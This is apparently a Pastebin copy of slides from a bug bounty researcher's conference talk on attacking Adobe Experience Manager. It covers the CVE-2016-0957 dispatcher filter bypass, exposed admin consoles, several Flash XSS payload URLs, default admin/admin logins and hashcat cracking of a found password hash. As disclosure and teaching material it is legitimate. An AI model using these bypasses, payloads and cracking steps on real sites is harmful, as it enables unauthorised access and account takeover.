Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @fransrosen A story of the passive aggressive sysadmin of AEM or "How to make a talk in 3h 35min"
- 2. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once
- 3. @fransrosen Frans Rosén Bug bounties! labs.detectify.com twitter.com/fransrosen I blogged about Subdomain Takeovers. Donald Trump got hacked. The hacker referred to my post as his inspiration. I broke Let’s Encrypt Live hacking! I won a boxing belt once namedropped in ytcracker - green hat
- 4. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- 5. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957
- 6. @fransrosen 2016 – Peter Adkins https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html CVE-2016-0957 "The world’s lamest RCE."
- 7. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- 8. @fransrosen How AEM is structured Adobe "black magic glue"
- 9. @fransrosen How AEM is structured Stuff you pay your consultants for Adobe "black magic glue"
- 10. @fransrosen Shit no one’s updating Stuff you pay your consultants for Adobe "black magic glue" How AEM is structured
- 11. @fransrosen How AEM is structured https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- 12. @fransrosen How AEM is structured Apache HTTP server module
- 13. @fransrosen How AEM is structured Reverse proxy+filter Apache HTTP server module
- 14. @fransrosen How AEM is structured Apache HTTP server module Pages + metadata + content Reverse proxy+filter
- 15. @fransrosen How AEM is structured Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools
- 16. @fransrosen How AEM is structured You should not have access to this Apache HTTP server module Pages + metadata + content Reverse proxy+filter A bunch of admin-tools
- 17. @fransrosen How AEM is structured You should not have access to this Or this Apache HTTP server module Reverse proxy+filter A bunch of admin-tools Pages + metadata + content
- 18. @fransrosen Creating pages
- 19. @fransrosen Creating pages Author creates a new page in the repo
- 20. @fransrosen Creating pages Author creates a new page in the repo Goes through the publisher nodes
- 21. @fransrosen Creating pages Author creates a new page in the repo Goes through the publisher nodes Dispatcher serves the content
- 22. @fransrosen Accessing pages
- 23. @fransrosen Accessing pages Dispatcher gets the URL
- 24. @fransrosen Accessing pages Dispatcher gets the URL Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
- 25. @fransrosen Accessing pages Dispatcher gets the URLIf all is OK, serve from publish node Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
- 26. @fransrosen CVE-2016-0957 aka "I am two years old but I’m inside an enterprise product that no one can or dares to upgrade"
- 27. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
- 28. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
- 29. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
- 30. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
- 31. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
- 32. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
- 33. @fransrosen CVE-2016-0957 Goes through a filter (This filter is awesome, it’s impossible to break, don’t even dare to try)
- 34. @fransrosen This is ridiculous
- 35. @fransrosen Accessing pages?.css Dispatcher gets the URL?.css
- 36. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is OK time
- 37. @fransrosen Accessing pages Dispatcher gets the URL?.css Every time is OK time Serve from publish node
- 38. @fransrosen Publish nodes
- 39. @fransrosen Disk usage /etc/reports/diskusage.html?.css Disk Usage lists all repo dirs + metadata
- 40. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css
- 41. @fransrosen My fav, opensocial proxy /libs/opensocial/proxy?url=x&.css
- 42. @fransrosen …but there’s more!
- 43. @fransrosen CRX Explorer /crx/de/index.jsp?.css
- 44. @fransrosen CRX Explorer /crx/explorer/browser/index.jsp?.css
- 45. @fransrosen CRX Explorer Search /crx/explorer/browser/index.jsp?.css
- 46. @fransrosen Content Repository Extreme /crx/explorer/index.jsp?.css
- 47. @fransrosen Package Manager /crx/packmgr/index.jsp?.css
- 48. @fransrosen Namespace Editor (no auth needed!) /crx/explorer/ui/namespace_editor.jsp?.css
- 49. @fransrosen bin/querybuilder /bin/querybuilder.json?.css
- 50. @fransrosen bin/querybuilder /bin/querybuilder.json?.css
- 51. @fransrosen
- 52. @fransrosen bin/querybuilder for SWFs!
- 53. @fransrosen bin/querybuilder for SWFs!
- 54. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)
- 55. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)
- 56. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String
- 57. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole
- 58. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// Thx Neal Poole
- 59. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window Thx Neal Poole
- 60. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// Thx Neal Poole
- 61. @fransrosen FLASHFEST in AEM CORE /etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d// /etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain) /etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String /libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d// /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window /etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d// /etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source] (document.domain)-window Thx Neal Poole
- 62. @fransrosen Allowing anonymous publish access
- 63. @fransrosen Allowing anonymous publish access
- 64. @fransrosen Allowing anonymous publish access 🤦
- 65. @fransrosen but Peter mentioned RCE?
- 66. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- 67. @fransrosen RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html admin / admin
- 68. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- 69. @fransrosen RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- 70. @fransrosen Patch for CVE-2016-0957
- 71. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!
- 72. @fransrosen Patch for CVE-2016-0957 WOHO! WOHO!
- 73. @fransrosen Patch for CVE-2016-0957 THEN WHAT IS THE PROBLEM? WOHO! WOHO!
- 74. @fransrosen Problem 1
- 75. @fransrosen Problem 1 🤦
- 76. @fransrosen Problem 1 🤦 PRIORITY: nah, bro
- 77. @fransrosen Problem 2
- 78. @fransrosen Problem 2 💸 💸 💸 💸 💸 💸
- 79. @fransrosen Patch for CVE-2016-0957 IRL VERSION
- 80. @fransrosen Patch for CVE-2016-0957 IRL
- 81. @fransrosen Patch for CVE-2016-0957 IRL
- 82. @fransrosen Patch for CVE-2016-0957 IRL
- 83. @fransrosen Bypasses, seriously ?.js ;%0a.css Thank Jasmin Landry for this one
- 84. @fransrosen The passive agressive sysadmin
- 85. @fransrosen The passive agressive sysadmin 💊 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵💵 💵💵 💵 💵💵💵 💵 + + 💊 💊💊 💊
- 86. @fransrosen The passive agressive sysadmin 💊 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵💵 💵💵 💵 💵💵💵 💵 + + 💊 💊💊 💊
- 87. @fransrosen I’ve seen this before
- 88. @fransrosen AEM
- 89. @fransrosen CRX
- 90. @fransrosen CRXDE
- 91. @fransrosen All other stuff
- 92. @fransrosen /system/console
- 93. @fransrosen /system/console admin / admin
- 94. @fransrosen /system/console admin / admin
- 95. @fransrosen Report!
- 96. @fransrosen Search time!
- 97. @fransrosen Search time!
- 98. @fransrosen Search time!
- 99. @fransrosen Search time!
- 100. @fransrosen WTF
- 101. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" | base64 -D | xxd -p | tr -d 'n')
- 102. @fransrosen WTF $ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" | base64 -D | xxd -p | tr -d 'n') $ echo $h e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a082 5798
- 103. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app -a 0 -m 1400 hash.txt rockyou.txt
- 104. @fransrosen hashcat ftw $ echo $h > hash.txt $ ./hashcat.app -a 0 -m 1400 hash.txt rockyou.txt Status.........: Cracked Started: Thu Sep 13 11:59:23 2018 Stopped: Thu Sep 13 11:59:25 2018
- 105. @fransrosen hashcat ftw ih8uall
- 106. @fransrosen /system/console
- 107. @fransrosen /system/console admin / ih8uall
- 108. @fransrosen /system/console
- 109. @fransrosen /system/console
- 110. @fransrosen Report 2
- 111. @fransrosen Report 2
- 112. @fransrosen Report 2
- 113. @fransrosen Public bug bounty programs with AEM Public responsible disclosure 📼 Private ones 🏨 💊💵
- 114. @fransrosen Thanks!
- Recommended
- Blackboard 9.x Essential Training: Instructors
- Blackboard 9.x Essential Training: Instructors
- Online Course - LinkedIn Learning
- PowerPoint for Teachers: Creating Interactive Lessons
- PowerPoint for Teachers: Creating Interactive Lessons
- Online Course - LinkedIn Learning
- 100 Courses and Counting: David Rivers on Elearning
- 100 Courses and Counting: David Rivers on Elearning
- Online Course - LinkedIn Learning
- DNS hijacking using cloud providers – No verification needed
- DNS hijacking using cloud providers – No verification needed
- Frans Rosén
- Time based CAPTCHA protected SQL injection through SOAP-webservice
- Time based CAPTCHA protected SQL injection through SOAP-webservice
- Frans Rosén
- The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
- The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
- Frans Rosén
- How to steal and modify data using Business Logic flaws - Insecure Direct Object References
- How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
- Frans Rosén
- The AI Rush
- The AI Rush
- Jean-Baptiste Dumont
- AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
- AI and Machine Learning Demystified by Carol Smith at Midwest UX 2017
- Carol Smith
- English Español Português Français Deutsch
Add Comment
Please, Sign In to add comment